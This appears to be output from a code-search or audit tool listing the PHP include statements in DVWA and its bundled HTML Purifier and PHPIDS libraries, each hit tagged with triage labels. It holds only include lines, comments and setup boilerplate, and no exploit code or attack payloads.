118:require 'HTMLPurifier/AttrTransform/ImgRequired.php';
119:require 'HTMLPurifier/AttrTransform/ImgSpace.php';
120:require 'HTMLPurifier/AttrTransform/Input.php';
121:require 'HTMLPurifier/AttrTransform/Lang.php';
122:require 'HTMLPurifier/AttrTransform/Length.php';
123:require 'HTMLPurifier/AttrTransform/Name.php';
124:require 'HTMLPurifier/AttrTransform/SafeEmbed.php';
125:require 'HTMLPurifier/AttrTransform/SafeObject.php';
126:require 'HTMLPurifier/AttrTransform/SafeParam.php';
127:require 'HTMLPurifier/AttrTransform/ScriptRequired.php';
128:require 'HTMLPurifier/AttrTransform/Textarea.php';
129:require 'HTMLPurifier/ChildDef/Chameleon.php';
130:require 'HTMLPurifier/ChildDef/Custom.php';
131:require 'HTMLPurifier/ChildDef/Empty.php';
132:require 'HTMLPurifier/ChildDef/Required.php';
133:require 'HTMLPurifier/ChildDef/Optional.php';
134:require 'HTMLPurifier/ChildDef/StrictBlockquote.php';
135:require 'HTMLPurifier/ChildDef/Table.php';
136:require 'HTMLPurifier/DefinitionCache/Decorator.php';
137:require 'HTMLPurifier/DefinitionCache/Null.php';
138:require 'HTMLPurifier/DefinitionCache/Serializer.php';
139:require 'HTMLPurifier/DefinitionCache/Decorator/Cleanup.php';
140:require 'HTMLPurifier/DefinitionCache/Decorator/Memory.php';
141:require 'HTMLPurifier/HTMLModule/Bdo.php';
142:require 'HTMLPurifier/HTMLModule/CommonAttributes.php';
143:require 'HTMLPurifier/HTMLModule/Edit.php';
144:require 'HTMLPurifier/HTMLModule/Forms.php';
145:require 'HTMLPurifier/HTMLModule/Hypertext.php';
146:require 'HTMLPurifier/HTMLModule/Image.php';
147:require 'HTMLPurifier/HTMLModule/Legacy.php';
148:require 'HTMLPurifier/HTMLModule/List.php';
149:require 'HTMLPurifier/HTMLModule/Name.php';
150:require 'HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php';
151:require 'HTMLPurifier/HTMLModule/Object.php';
152:require 'HTMLPurifier/HTMLModule/Presentation.php';
153:require 'HTMLPurifier/HTMLModule/Proprietary.php';
154:require 'HTMLPurifier/HTMLModule/Ruby.php';
155:require 'HTMLPurifier/HTMLModule/SafeEmbed.php';
156:require 'HTMLPurifier/HTMLModule/SafeObject.php';
157:require 'HTMLPurifier/HTMLModule/Scripting.php';
158:require 'HTMLPurifier/HTMLModule/StyleAttribute.php';
159:require 'HTMLPurifier/HTMLModule/Tables.php';
160:require 'HTMLPurifier/HTMLModule/Target.php';
161:require 'HTMLPurifier/HTMLModule/Text.php';
162:require 'HTMLPurifier/HTMLModule/Tidy.php';
163:require 'HTMLPurifier/HTMLModule/XMLCommonAttributes.php';
164:require 'HTMLPurifier/HTMLModule/Tidy/Name.php';
165:require 'HTMLPurifier/HTMLModule/Tidy/Proprietary.php';
166:require 'HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php';
167:require 'HTMLPurifier/HTMLModule/Tidy/Strict.php';
168:require 'HTMLPurifier/HTMLModule/Tidy/Transitional.php';
169:require 'HTMLPurifier/HTMLModule/Tidy/XHTML.php';
170:require 'HTMLPurifier/Injector/AutoParagraph.php';
171:require 'HTMLPurifier/Injector/DisplayLinkURI.php';
172:require 'HTMLPurifier/Injector/Linkify.php';
173:require 'HTMLPurifier/Injector/PurifierLinkify.php';
174:require 'HTMLPurifier/Injector/RemoveEmpty.php';
175:require 'HTMLPurifier/Injector/SafeObject.php';
176:require 'HTMLPurifier/Lexer/DOMLex.php';
177:require 'HTMLPurifier/Lexer/DirectLex.php';
178:require 'HTMLPurifier/Strategy/Composite.php';
179:require 'HTMLPurifier/Strategy/Core.php';
180:require 'HTMLPurifier/Strategy/FixNesting.php';
181:require 'HTMLPurifier/Strategy/MakeWellFormed.php';
182:require 'HTMLPurifier/Strategy/RemoveForeignElements.php';
183:require 'HTMLPurifier/Strategy/ValidateAttributes.php';
184:require 'HTMLPurifier/TagTransform/Font.php';
185:require 'HTMLPurifier/TagTransform/Simple.php';
186:require 'HTMLPurifier/Token/Comment.php';
187:require 'HTMLPurifier/Token/Tag.php';
188:require 'HTMLPurifier/Token/Empty.php';
189:require 'HTMLPurifier/Token/End.php';
190:require 'HTMLPurifier/Token/Start.php';
191:require 'HTMLPurifier/Token/Text.php';
192:require 'HTMLPurifier/URIFilter/DisableExternal.php';
193:require 'HTMLPurifier/URIFilter/DisableExternalResources.php';
194:require 'HTMLPurifier/URIFilter/HostBlacklist.php';
195:require 'HTMLPurifier/URIFilter/MakeAbsolute.php';
196:require 'HTMLPurifier/URIFilter/Munge.php';
197:require 'HTMLPurifier/URIScheme/ftp.php';
198:require 'HTMLPurifier/URIScheme/http.php';
199:require 'HTMLPurifier/URIScheme/https.php';
200:require 'HTMLPurifier/URIScheme/mailto.php';
201:require 'HTMLPurifier/URIScheme/news.php';
202:require 'HTMLPurifier/URIScheme/nntp.php';
203:require 'HTMLPurifier/VarParser/Flexible.php';
204:require 'HTMLPurifier/VarParser/Native.php';
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:6 (84/99) OK | Dubious | Bad | Hide
3-/**
4- * @file
5- * This file was auto-generated by generate-includes.php and includes all of
6: * the core files required by HTML Purifier. This is a convenience stub that
7: * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT
8- * EDIT THIS FILE, changes will be overwritten the next time the script is run.
9- * 
10- * Changes to include_path are not necessary.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:15 (85/99) OK | Dubious | Bad | Hide
12-
13-$__dir = dirname(__FILE__);
14-
15:require_once $__dir . '/HTMLPurifier.php';
16:require_once $__dir . '/HTMLPurifier/AttrCollections.php';
17:require_once $__dir . '/HTMLPurifier/AttrDef.php';
18:require_once $__dir . '/HTMLPurifier/AttrTransform.php';
19:require_once $__dir . '/HTMLPurifier/AttrTypes.php';
20:require_once $__dir . '/HTMLPurifier/AttrValidator.php';
21:require_once $__dir . '/HTMLPurifier/Bootstrap.php';
22:require_once $__dir . '/HTMLPurifier/Definition.php';
23:require_once $__dir . '/HTMLPurifier/CSSDefinition.php';
24:require_once $__dir . '/HTMLPurifier/ChildDef.php';
25:require_once $__dir . '/HTMLPurifier/Config.php';
26:require_once $__dir . '/HTMLPurifier/ConfigSchema.php';
27:require_once $__dir . '/HTMLPurifier/ContentSets.php';
28:require_once $__dir . '/HTMLPurifier/Context.php';
29:require_once $__dir . '/HTMLPurifier/DefinitionCache.php';
30:require_once $__dir . '/HTMLPurifier/DefinitionCacheFactory.php';
31:require_once $__dir . '/HTMLPurifier/Doctype.php';
32:require_once $__dir . '/HTMLPurifier/DoctypeRegistry.php';
33:require_once $__dir . '/HTMLPurifier/ElementDef.php';
34:require_once $__dir . '/HTMLPurifier/Encoder.php';
35:require_once $__dir . '/HTMLPurifier/EntityLookup.php';
36:require_once $__dir . '/HTMLPurifier/EntityParser.php';
37:require_once $__dir . '/HTMLPurifier/ErrorCollector.php';
38:require_once $__dir . '/HTMLPurifier/ErrorStruct.php';
39:require_once $__dir . '/HTMLPurifier/Exception.php';
40:require_once $__dir . '/HTMLPurifier/Filter.php';
41:require_once $__dir . '/HTMLPurifier/Generator.php';
42:require_once $__dir . '/HTMLPurifier/HTMLDefinition.php';
43:require_once $__dir . '/HTMLPurifier/HTMLModule.php';
44:require_once $__dir . '/HTMLPurifier/HTMLModuleManager.php';
45:require_once $__dir . '/HTMLPurifier/IDAccumulator.php';
46:require_once $__dir . '/HTMLPurifier/Injector.php';
47:require_once $__dir . '/HTMLPurifier/Language.php';
48:require_once $__dir . '/HTMLPurifier/LanguageFactory.php';
49:require_once $__dir . '/HTMLPurifier/Length.php';
50:require_once $__dir . '/HTMLPurifier/Lexer.php';
51:require_once $__dir . '/HTMLPurifier/PercentEncoder.php';
52:require_once $__dir . '/HTMLPurifier/Strategy.php';
53:require_once $__dir . '/HTMLPurifier/StringHash.php';
54:require_once $__dir . '/HTMLPurifier/StringHashParser.php';
55:require_once $__dir . '/HTMLPurifier/TagTransform.php';
56:require_once $__dir . '/HTMLPurifier/Token.php';
57:require_once $__dir . '/HTMLPurifier/TokenFactory.php';
58:require_once $__dir . '/HTMLPurifier/URI.php';
59:require_once $__dir . '/HTMLPurifier/URIDefinition.php';
60:require_once $__dir . '/HTMLPurifier/URIFilter.php';
61:require_once $__dir . '/HTMLPurifier/URIParser.php';
62:require_once $__dir . '/HTMLPurifier/URIScheme.php';
63:require_once $__dir . '/HTMLPurifier/URISchemeRegistry.php';
64:require_once $__dir . '/HTMLPurifier/UnitConverter.php';
65:require_once $__dir . '/HTMLPurifier/VarParser.php';
66:require_once $__dir . '/HTMLPurifier/VarParserException.php';
67:require_once $__dir . '/HTMLPurifier/AttrDef/CSS.php';
68:require_once $__dir . '/HTMLPurifier/AttrDef/Enum.php';
69:require_once $__dir . '/HTMLPurifier/AttrDef/Integer.php';
70:require_once $__dir . '/HTMLPurifier/AttrDef/Lang.php';
71:require_once $__dir . '/HTMLPurifier/AttrDef/Switch.php';
72:require_once $__dir . '/HTMLPurifier/AttrDef/Text.php';
73:require_once $__dir . '/HTMLPurifier/AttrDef/URI.php';
74:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Number.php';
75:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/AlphaValue.php';
76:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Background.php';
77:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php';
78:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Border.php';
79:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Color.php';
80:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Composite.php';
81:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php';
82:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Filter.php';
83:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Font.php';
84:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/FontFamily.php';
85:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php';
86:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Length.php';
87:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ListStyle.php';
88:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Multiple.php';
89:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Percentage.php';
90:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/TextDecoration.php';
91:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/URI.php';
92:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Bool.php';
93:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Color.php';
94:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/FrameTarget.php';
95:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/ID.php';
96:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Pixels.php';
97:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Length.php';
98:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/LinkTypes.php';
99:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/MultiLength.php';
100:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Nmtokens.php';
101:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email.php';
102:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Host.php';
103:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv4.php';
104:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv6.php';
105:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php';
106:require_once $__dir . '/HTMLPurifier/AttrTransform/Background.php';
107:require_once $__dir . '/HTMLPurifier/AttrTransform/BdoDir.php';
108:require_once $__dir . '/HTMLPurifier/AttrTransform/BgColor.php';
109:require_once $__dir . '/HTMLPurifier/AttrTransform/BoolToCSS.php';
110:require_once $__dir . '/HTMLPurifier/AttrTransform/Border.php';
111:require_once $__dir . '/HTMLPurifier/AttrTransform/EnumToCSS.php';
112:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgRequired.php';
113:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgSpace.php';
114:require_once $__dir . '/HTMLPurifier/AttrTransform/Input.php';
115:require_once $__dir . '/HTMLPurifier/AttrTransform/Lang.php';
116:require_once $__dir . '/HTMLPurifier/AttrTransform/Length.php';
117:require_once $__dir . '/HTMLPurifier/AttrTransform/Name.php';
118:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeEmbed.php';
119:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeObject.php';
120:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeParam.php';
121:require_once $__dir . '/HTMLPurifier/AttrTransform/ScriptRequired.php';
122:require_once $__dir . '/HTMLPurifier/AttrTransform/Textarea.php';
123:require_once $__dir . '/HTMLPurifier/ChildDef/Chameleon.php';
124:require_once $__dir . '/HTMLPurifier/ChildDef/Custom.php';
125:require_once $__dir . '/HTMLPurifier/ChildDef/Empty.php';
126:require_once $__dir . '/HTMLPurifier/ChildDef/Required.php';
127:require_once $__dir . '/HTMLPurifier/ChildDef/Optional.php';
128:require_once $__dir . '/HTMLPurifier/ChildDef/StrictBlockquote.php';
129:require_once $__dir . '/HTMLPurifier/ChildDef/Table.php';
130:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator.php';
131:require_once $__dir . '/HTMLPurifier/DefinitionCache/Null.php';
132:require_once $__dir . '/HTMLPurifier/DefinitionCache/Serializer.php';
133:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php';
134:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Memory.php';
135:require_once $__dir . '/HTMLPurifier/HTMLModule/Bdo.php';
136:require_once $__dir . '/HTMLPurifier/HTMLModule/CommonAttributes.php';
137:require_once $__dir . '/HTMLPurifier/HTMLModule/Edit.php';
138:require_once $__dir . '/HTMLPurifier/HTMLModule/Forms.php';
139:require_once $__dir . '/HTMLPurifier/HTMLModule/Hypertext.php';
140:require_once $__dir . '/HTMLPurifier/HTMLModule/Image.php';
141:require_once $__dir . '/HTMLPurifier/HTMLModule/Legacy.php';
142:require_once $__dir . '/HTMLPurifier/HTMLModule/List.php';
143:require_once $__dir . '/HTMLPurifier/HTMLModule/Name.php';
144:require_once $__dir . '/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php';
145:require_once $__dir . '/HTMLPurifier/HTMLModule/Object.php';
146:require_once $__dir . '/HTMLPurifier/HTMLModule/Presentation.php';
147:require_once $__dir . '/HTMLPurifier/HTMLModule/Proprietary.php';
148:require_once $__dir . '/HTMLPurifier/HTMLModule/Ruby.php';
149:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeEmbed.php';
150:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeObject.php';
151:require_once $__dir . '/HTMLPurifier/HTMLModule/Scripting.php';
152:require_once $__dir . '/HTMLPurifier/HTMLModule/StyleAttribute.php';
153:require_once $__dir . '/HTMLPurifier/HTMLModule/Tables.php';
154:require_once $__dir . '/HTMLPurifier/HTMLModule/Target.php';
155:require_once $__dir . '/HTMLPurifier/HTMLModule/Text.php';
156:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy.php';
157:require_once $__dir . '/HTMLPurifier/HTMLModule/XMLCommonAttributes.php';
158:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Name.php';
159:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Proprietary.php';
160:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php';
161:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Strict.php';
162:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Transitional.php';
163:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTML.php';
164:require_once $__dir . '/HTMLPurifier/Injector/AutoParagraph.php';
165:require_once $__dir . '/HTMLPurifier/Injector/DisplayLinkURI.php';
166:require_once $__dir . '/HTMLPurifier/Injector/Linkify.php';
167:require_once $__dir . '/HTMLPurifier/Injector/PurifierLinkify.php';
168:require_once $__dir . '/HTMLPurifier/Injector/RemoveEmpty.php';
169:require_once $__dir . '/HTMLPurifier/Injector/SafeObject.php';
170:require_once $__dir . '/HTMLPurifier/Lexer/DOMLex.php';
171:require_once $__dir . '/HTMLPurifier/Lexer/DirectLex.php';
172:require_once $__dir . '/HTMLPurifier/Strategy/Composite.php';
173:require_once $__dir . '/HTMLPurifier/Strategy/Core.php';
174:require_once $__dir . '/HTMLPurifier/Strategy/FixNesting.php';
175:require_once $__dir . '/HTMLPurifier/Strategy/MakeWellFormed.php';
176:require_once $__dir . '/HTMLPurifier/Strategy/RemoveForeignElements.php';
177:require_once $__dir . '/HTMLPurifier/Strategy/ValidateAttributes.php';
178:require_once $__dir . '/HTMLPurifier/TagTransform/Font.php';
179:require_once $__dir . '/HTMLPurifier/TagTransform/Simple.php';
180:require_once $__dir . '/HTMLPurifier/Token/Comment.php';
181:require_once $__dir . '/HTMLPurifier/Token/Tag.php';
182:require_once $__dir . '/HTMLPurifier/Token/Empty.php';
183:require_once $__dir . '/HTMLPurifier/Token/End.php';
184:require_once $__dir . '/HTMLPurifier/Token/Start.php';
185:require_once $__dir . '/HTMLPurifier/Token/Text.php';
186:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternal.php';
187:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternalResources.php';
188:require_once $__dir . '/HTMLPurifier/URIFilter/HostBlacklist.php';
189:require_once $__dir . '/HTMLPurifier/URIFilter/MakeAbsolute.php';
190:require_once $__dir . '/HTMLPurifier/URIFilter/Munge.php';
191:require_once $__dir . '/HTMLPurifier/URIScheme/ftp.php';
192:require_once $__dir . '/HTMLPurifier/URIScheme/http.php';
193:require_once $__dir . '/HTMLPurifier/URIScheme/https.php';
194:require_once $__dir . '/HTMLPurifier/URIScheme/mailto.php';
195:require_once $__dir . '/HTMLPurifier/URIScheme/news.php';
196:require_once $__dir . '/HTMLPurifier/URIScheme/nntp.php';
197:require_once $__dir . '/HTMLPurifier/VarParser/Flexible.php';
198:require_once $__dir . '/HTMLPurifier/VarParser/Native.php';
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.kses.php:8 (86/99) OK | Dubious | Bad | Hide
5- * Emulation layer for code that used kses(), substituting in HTML Purifier.
6- */
7-
8:require_once dirname(__FILE__) . '/HTMLPurifier.auto.php';
9-
10-function kses($string, $allowed_html, $allowed_protocols = null) {
11-    $config = HTMLPurifier_Config::createDefault();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.auto.php:8 (87/99) OK | Dubious | Bad | Hide
5- */
6-
7-set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
8:require_once 'HTMLPurifier/Bootstrap.php';
9:require_once 'HTMLPurifier.autoload.php';
./external/phpids/0.6/lib/IDS/Log/Composite.php:34 (88/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Log Composite
./external/phpids/0.6/lib/IDS/Log/File.php:34 (89/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * File logging wrapper
./external/phpids/0.6/lib/IDS/Log/File.php:140 (90/99) OK | Dubious | Bad | Hide
137-     * Prepares data
138-     *
139-     * Converts given data into a format that can be stored into a file. 
140:     * You might edit this method to your requirements.
141-     *
142-     * @param mixed $data incoming report data
143-     *
./external/phpids/0.6/lib/IDS/Log/Email.php:34 (91/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Email logging wrapper
./external/phpids/0.6/lib/IDS/Log/Email.php:264 (92/99) OK | Dubious | Bad | Hide
261-     * Prepares data
262-     *
263-     * Converts given data into a format that can be read in an email.
264:     * You might edit this method to your requirements.
265-     *
266-     * @param mixed $data the report data
267-     *
./external/phpids/0.6/lib/IDS/Log/Database.php:34 (93/99) OK | Dubious | Bad | Hide
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/*
37- * Needed SQL:
./setup.php:4 (94/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-
./phpinfo.php:3 (95/99) OK | Dubious | Bad | Hide
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./dvwa/includes/dvwaPage.inc.php:15 (96/99) OK | Dubious | Bad | Hide
12-
13-
14-// Include configs
15:require_once DVWA_WEB_PAGE_TO_ROOT.'config/config.inc.php';
16-
17:require_once( 'dvwaPhpIds.inc.php' );
18-
19-// Declare the $html variable
20-if(!isset($html)){
./dvwa/includes/dvwaPhpIds.inc.php:14 (97/99) OK | Dubious | Bad | Hide
11-// Add PHPIDS to include path
12-set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' );
13-
14:require_once 'IDS/Init.php';
15-
16-function dvwaPhpIdsVersionGet() {
17-	return '0.6';
./dvwa/includes/dvwaPhpIds.inc.php:74 (98/99) OK | Dubious | Bad | Hide
71-		$result = $ids->run();
72-
73-		if (!$result->isEmpty()) {
74:			require_once 'IDS/Log/File.php';
75:			require_once 'IDS/Log/Composite.php';
76-
77-			$compositeLog = new IDS_Log_Composite();
78-			$compositeLog->addLogger(IDS_Log_File::getInstance($init));
./logout.php:4 (99/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-

require_once (58) Top | Hide

./instructions.php:4 (1/58) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./index.php:5 (2/58) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
8-
./login.php:5 (3/58) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'phpids' ) );
8-
./ids_log.php:4 (4/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-define( 'DVWA_WEB_ROOT_TO_PHPIDS_LOG', 'external/phpids/'.dvwaPhpIdsVersionGet().'/lib/IDS/tmp/phpids_log.txt' );
7-define( 'DVWA_WEB_PAGE_TO_PHPIDS_LOG', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS_LOG );
./about.php:4 (5/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./security.php:4 (6/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:4 (7/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:30 (8/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/csrf/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'csrf';
33-$page[ 'source_button' ] = 'csrf';
./vulnerabilities/fi/index.php:4 (9/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/index.php:30 (10/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/fi/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'fi';
33-$page[ 'source_button' ] = 'fi';
./vulnerabilities/sqli_blind/index.php:4 (11/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli_blind/index.php:30 (12/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli_blind/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli_blind';
33-$page[ 'source_button' ] = 'sqli_blind';
./vulnerabilities/view_source.php:4 (13/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:4 (14/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:30 (15/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/brute/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'brute';
33-$page[ 'source_button' ] = 'brute';
./vulnerabilities/exec/index.php:4 (16/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/exec/index.php:30 (17/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/exec/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'exec';
33-$page[ 'source_button' ] = 'exec';
./vulnerabilities/upload/index.php:4 (18/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/upload/index.php:30 (19/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/upload/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'upload';
33-$page[ 'source_button' ] = 'upload';
./vulnerabilities/view_help.php:4 (20/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:4 (21/58) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:30 (22/58) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli';
33-$page[ 'source_button' ] = 'sqli';
./vulnerabilities/view_source_all.php:3 (23/58) OK | Dubious | Bad | Hide
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
